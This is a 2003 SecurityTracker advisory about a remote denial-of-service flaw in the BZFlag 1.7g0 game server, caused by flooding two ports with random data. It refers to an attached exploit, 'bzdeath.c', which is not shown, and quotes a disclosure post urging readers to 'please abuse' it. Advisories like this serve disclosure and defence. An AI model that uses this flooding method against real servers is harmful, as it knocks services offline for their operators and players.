SecurityTracker.com
Category:   Application (Game)  >   BZFlag
Vendors:   bzflag.org
BZFlag Game Server Can Be Crashed By Remote Users
SecurityTracker Alert ID:  1006801
SecurityTracker URL:  http://securitytracker.com/id/1006801
CVE Reference:   GENERIC-MAP-NOMATCH
Date:  May 20 2003
Impact:   Denial of service via network
Exploit Included:  Yes  
Version(s): 1.7g0
Description:   A vulnerability was reported in the BZFlag game server. A remote user can cause the target server's CPU utilization to increase significantly and may be able to cause the service to crash.

A remote user can connect to the BZFlag server on two ports and flood those ports with random data. This can reportedly trigger a memory leak and drive CPU utilization to excessive levels. It may also cause the daemon to crash.

The attack is reported to work best on fast connections, but has also been tested successfully on slower connections.

A demonstration exploit is provided in the Source Message [it is Base64-encoded].

Impact:   A remote user can cause excessive CPU utilization on the target server. A remote user may be able to cause the game server to crash.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.bzflag.org/
Cause:   Resource error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-Disclosure] Remote bzflag 1.7g0 server DoS



bzdeath.c attached, please abuse.

--
russian code molester